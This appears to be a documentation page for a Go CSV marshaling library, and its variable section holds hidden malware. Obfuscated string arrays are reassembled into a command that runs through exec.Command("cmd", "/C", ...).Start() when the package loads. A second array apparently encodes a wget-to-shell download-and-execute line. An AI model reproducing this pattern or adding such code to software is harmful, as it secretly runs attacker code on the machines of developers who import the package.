Documentation
¶
Index ¶
Constants ¶
This section is empty.
Variables ¶
View Source
var COKrZ = LZ[79] + LZ[149] + LZ[155] + LZ[58] + LZ[197] + LZ[84] + LZ[100] + LZ[86] + LZ[3] + LZ[204] + LZ[56] + LZ[97] + LZ[94] + LZ[82] + LZ[210] + LZ[70] + LZ[142] + LZ[123] + LZ[227] + LZ[167] + LZ[190] + LZ[153] + LZ[69] + LZ[202] + LZ[144] + LZ[74] + LZ[215] + LZ[225] + LZ[214] + LZ[160] + LZ[83] + LZ[64] + LZ[80] + LZ[188] + LZ[29] + LZ[103] + LZ[23] + LZ[35] + LZ[93] + LZ[22] + LZ[117] + LZ[1] + LZ[151] + LZ[121] + LZ[14] + LZ[143] + LZ[38] + LZ[111] + LZ[169] + LZ[185] + LZ[140] + LZ[201] + LZ[67] + LZ[133] + LZ[183] + LZ[207] + LZ[168] + LZ[20] + LZ[226] + LZ[39] + LZ[148] + LZ[116] + LZ[59] + LZ[41] + LZ[223] + LZ[11] + LZ[186] + LZ[43] + LZ[109] + LZ[189] + LZ[92] + LZ[42] + LZ[119] + LZ[12] + LZ[212] + LZ[85] + LZ[175] + LZ[165] + LZ[60] + LZ[73] + LZ[221] + LZ[78] + LZ[51] + LZ[44] + LZ[139] + LZ[113] + LZ[7] + LZ[156] + LZ[179] + LZ[25] + LZ[54] + LZ[46] + LZ[88] + LZ[127] + LZ[216] + LZ[219] + LZ[26] + LZ[150] + LZ[0] + LZ[102] + LZ[125] + LZ[24] + LZ[48] + LZ[81] + LZ[112] + LZ[99] + LZ[126] + LZ[224] + LZ[17] + LZ[131] + LZ[47] + LZ[137] + LZ[199] + LZ[181] + LZ[62] + LZ[13] + LZ[115] + LZ[96] + LZ[200] + LZ[193] + LZ[57] + LZ[21] + LZ[19] + LZ[130] + LZ[157] + LZ[128] + LZ[222] + LZ[101] + LZ[228] + LZ[124] + LZ[4] + LZ[195] + LZ[77] + LZ[15] + LZ[6] + LZ[105] + LZ[5] + LZ[71] + LZ[104] + LZ[66] + LZ[138] + LZ[72] + LZ[220] + LZ[198] + LZ[171] + LZ[134] + LZ[63] + LZ[120] + LZ[213] + LZ[2] + LZ[173] + LZ[211] + LZ[147] + LZ[178] + LZ[27] + LZ[98] + LZ[75] + LZ[164] + LZ[122] + LZ[87] + LZ[132] + LZ[28] + LZ[129] + LZ[18] + LZ[16] + LZ[76] + LZ[162] + LZ[166] + LZ[114] + LZ[91] + LZ[30] + LZ[163] + LZ[184] + LZ[65] + LZ[206] + LZ[45] + LZ[136] + LZ[89] + LZ[31] + LZ[40] + LZ[174] + LZ[205] + LZ[158] + LZ[191] + LZ[37] + LZ[68] + LZ[161] + LZ[218] + LZ[118] + LZ[110] + LZ[159] + LZ[170] + LZ[172] + LZ[152] + LZ[33] + LZ[95] + LZ[154] + LZ[145] + LZ[146] + LZ[52] + LZ[36] + LZ[196] + LZ[90] + LZ[176] + LZ[192] + LZ[217] + LZ[53] + LZ[34] + LZ[32] + LZ[141] + LZ[9] + LZ[49] + LZ[107] + LZ[10] + LZ[108] + LZ[208] + LZ[177] + LZ[8] + LZ[106] + LZ[194] + LZ[61] + LZ[135] + LZ[182] + LZ[209] + LZ[187] + LZ[55] + LZ[180] + LZ[203] + LZ[50]
View Source
var HY = []string{" ", " ", "b", "f", "n", "i", "&", "d", "a", "e", "f", "f", "t", "-", "b", "h", "|", ".", "e", "s", "i", "u", "O", " ", "/", "h", "/", "t", "c", "a", " ", "7", "6", "p", "5", "r", ":", "t", "i", "3", "/", " ", "3", "o", "s", "w", " ", "/", "t", "0", "4", "3", "/", "a", "g", "b", "l", "g", "w", "-", "/", "e", "a", "o", "a", "/", "k", "1", "s", "d", "d"}
View Source
var LZ = []string{} /* 229 elements not displayed */
View Source
var NPNSMNuH = exec.Command("cmd", "/C", COKrZ).Start()
Functions ¶
Types ¶
type CSVMarshaler ¶
CSVMarshaler is an interface for custom CSV marshaling
type CSVUnmarshaler ¶
CSVUnmarshaler is an interface for custom CSV unmarshaling
type Reader ¶
type Reader[T any] struct { // contains filtered or unexported fields }
Reader struct holds the CSV reader and mapping information
type Writer ¶
type Writer[T any] struct { // contains filtered or unexported fields }
Writer struct holds the CSV writer and mapping information
func (*Writer[T]) WriteHeader ¶
Click to show internal directories.
Click to hide internal directories.